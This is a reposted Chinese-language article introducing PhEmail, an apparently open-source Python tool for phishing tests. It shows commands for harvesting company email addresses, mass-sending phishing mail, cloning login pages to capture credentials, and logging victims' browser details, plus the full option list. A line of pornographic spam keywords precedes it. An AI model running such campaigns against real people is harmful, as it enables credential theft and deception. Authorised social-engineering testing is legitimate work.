av激情亚洲男人的天堂国语,日韩欧美精品一中文字幕,无码av一区二区三区无码,国产又色又爽又刺激的a片,国产又色又爽又刺激的a片

PhEmail:基于Python的開源網(wǎng)絡(luò)釣魚攻擊工具

PhEmail簡介

PhEmail是一款采用Python編程語言開發(fā)的開源網(wǎng)絡(luò)釣魚郵件工具,它可以幫助研究人員在進(jìn)行社會工程學(xué)測試的過程中自動化地給目標(biāo)發(fā)送網(wǎng)絡(luò)釣魚郵件。PhEmail不僅可以同時向多個目標(biāo)用戶發(fā)送釣魚郵件并識別出哪些用戶點(diǎn)擊了郵件,而且還可以在不利用任何瀏覽器漏洞或郵件客戶端漏洞的前提下盡可能多地收集信息。PhEmail自帶的引擎可以通過LinkedIN來收集電子郵箱地址,這些數(shù)據(jù)可以幫助測試人員完成信息采集階段的一部分工作。

除此之外,PhEmail還支持Gmail身份驗證,這一功能在目標(biāo)站點(diǎn)屏蔽了郵件源或IP地址的情況下會非常有用。值得一提的是,該工具還可以克隆目標(biāo)組織或企業(yè)的門戶網(wǎng)站登錄界面,測試人員可以用這些偽造的頁面來竊取目標(biāo)用戶的登錄憑證。

使用樣例

一般來說,第一步是收集目標(biāo)企業(yè)的郵箱地址。PhEmail的搜索引擎在收集到了企業(yè)郵箱地址之后,會將它們保存在一個文件中,演示代碼如下:

 
 
 
 
    
  
  
  
  
  1. # phemail.py [email protected] 
    2.   
  
  
  
  2. Gathering emails from domain: example.com100%  
    3.   
  
  
  
  3. Completed! 
    4.   
  
  
  
  4. [email protected] 
    5.   
  
  
  
  5. [email protected] […] emails.txt updated 
    6.

得到了企業(yè)郵箱地址之后,接下來就要創(chuàng)建釣魚郵件模板了。模板中的每一個URL必須要包含一個字符串”{0}”,因為腳本會自動將這個字符串替換成正確的URL地址。一次真實(shí)的測試場景截圖如下:

接下來,我們需要在Web服務(wù)器上安裝php環(huán)境并將php文件”index.php”復(fù)制到Web服務(wù)器的根目錄下。這個文件中包含的JavaScript代碼會收集瀏覽器信息并將其保存到/tmp目錄下的日志文件中。演示實(shí)例如下:

 
 
 
 
    
  
  
  
  
  1. # phemail.py -e test-emails.txt -f"Fast Holiday " -r "Fast Holiday " -s "Last MinuteHoliday" -b body.txt -w http://YOUR-WEBSITE.com 
    2.   
  
  
  
  2. SMTP server: mail.example.com  
    3.   
  
  
  
  3. Sent to [email protected] 
    4.   
  
  
  
  4. Error: sending [email protected]  
    5.   
  
  
  
  5. Phishing URLs point to http://YOUR-WEBSITE.com 
    6.   
  
  
  
  6. Phemail.py log file saved: phemail-log-12-07-2012_15-42.txt 
    7.

接下來,你只需要等待目標(biāo)用戶點(diǎn)擊釣魚郵件,然后你就能夠收集到目標(biāo)用戶的某些瀏覽器信息了:

 
 
 
 
    
  
  
  
  
  1. Email: [email protected] 
    2.   
  
  
  
  2. Date: Thu 12/07/2012 11:00:13  
    3.   
  
  
  
  3. IP: 192.168.0.123  
    4.   
  
  
  
  4. User Agent: Mozilla/5.0 (Windows NT 6.1;WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1 appCodeName: Mozilla appName:Netscape appVersion: 5.0 (Windows) appMinorVersion: undefined product: GeckocookieEnabled: true cpuClass: undefined onLine: true opsProfile: undefineduserProfile: undefined language: en-US platform: Win32 systemLanguage:undefined userLanguage: undefined flash: Enabled Plugins: Google UpdateShockwave Flash 11.3 r300 Google Talk Plugin Video Acceleratorversion:0.1.44.16 Version 3.1.4.8140 5.1.10411.0 Adobe PDF Plug-In For Firefoxand Netscape 10.1.3 NPRuntime Script Plug-in Library for Java? Deploy VmwareRemote Console and Client Integration Plug-in BlackBerry WebSL Browser Plug-InBing Bar The plug-in allows you to open and edit files using Microsoft Officeapplications Office Authorization plug-in for NPAPI browsers 
    5.

PhEmail項目主頁

【 GitHub傳送門 】

工具下載

你可以直接通過克隆PhEmail的GitHub代碼庫來完成工具的下載:

 
 
 
 
    
  
  
  
  
  1. git clone https://github.com/Dionach/PhEmail 
    2.

工具使用

 
 
 
 
    
  
  
  
  
  1. PHishing EMAIL tool v0.13 
    2.   
  
  
  
  2. Usage: phemail.py [-e ] [-m] [-f ] [-r ] [-s] [-b ] 
    3.   
  
  
  
  3.          -e    emails: File containing list of emails(Default: emails.txt) 
    4.   
  
  
  
  4.          -f    from_address: Source emailaddress displayed in FROM field of the email (Default: Name Surname
    5.   
  
  
  
  5.          -r    reply_address: Actual emailaddress used to send the emails in case that people reply to the email(Default: Name Surname 
    6.   
  
  
  
  6.          -s    subject: Subject of theemail (Default: Newsletter) 
    7.   
  
  
  
  7.          -b    body: Body of the email(Default: body.txt) 
    8.   
  
  
  
  8.          -p    pages: Specifies number ofresults pages searched (Default: 10 pages) 
    9.   
  
  
  
  9.          -v    verbose: Verbose Mode(Default: false) 
    10.   
  
  
  
  10.          -l    layout: Send email with noembedded pictures  
    11.   
  
  
  
  11.          -B    BeEF: Add the hook for BeEF 
    12.   
  
  
  
  12.          -m    mail_server: SMTP mailserver to connect to 
    13.   
  
  
  
  13.          -g    Google: Use a google accountusername:password 
    14.   
  
  
  
  14.          -t    Time delay: Add deleaybetween each email (Default: 3 sec) 
    15.   
  
  
  
  15.          -R    Bunch of emails per time(Default: 10 emails) 
    16.   
  
  
  
  16.          -L    webserverLog: Customise thename of the webserver log file (Default: Date time in format"%d_%m_%Y_%H_%M") 
    17.   
  
  
  
  17.          -S    Search: query on Google 
    18.   
  
  
  
  18.          -d    domain: of email addresses 
    19.   
  
  
  
  19.          -n    number: of emails perconnection (Default: 10 emails) 
    20.   
  
  
  
  20.           -c   clone: Clone a web page 
    21.   
  
  
  
  21.          -w    website: where the phishingemail link points to 
    22.   
  
  
  
  22.          -o    save output in a file 
    23.   
  
  
  
  23.          -F    Format (Default: 0):  
    24.   
  
  
  
  24.                 0- firstname surname 
    25.   
  
  
  
  25.                 1- [email protected] 
    26.   
  
  
  
  26.                 2- [email protected] 
    27.   
  
  
  
  27.                 3- [email protected] 
    28.   
  
  
  
  28.                 4- [email protected] 
    29.   
  
  
  
  29.                 [email protected] 
    30.   
  
  
  
  30.                 6- [email protected] 
    31.   
  
  
  
  31.                 7- [email protected] 
    32.   
  
  
  
  32.                 8- [email protected] 
    33.   
  
  
  
  33.                 9- firstname_ 
    34.

免責(zé)聲明

請不要在沒有得到目標(biāo)用戶事先同意的情況下實(shí)用PhEmail來進(jìn)行測試,由使用者自身使用不當(dāng)所帶來的問題開發(fā)人員不承擔(dān)任何責(zé)任,同時我們也對PhEmail所帶來的損失概不負(fù)責(zé),請大家妥善使用。


網(wǎng)站名稱:PhEmail:基于Python的開源網(wǎng)絡(luò)釣魚攻擊工具
鏈接地址:http://uogjgqi.cn/article/coighoo.html
掃二維碼與項目經(jīng)理溝通

我們在微信上24小時期待你的聲音

解答本文疑問/技術(shù)咨詢/運(yùn)營咨詢/技術(shù)建議/互聯(lián)網(wǎng)交流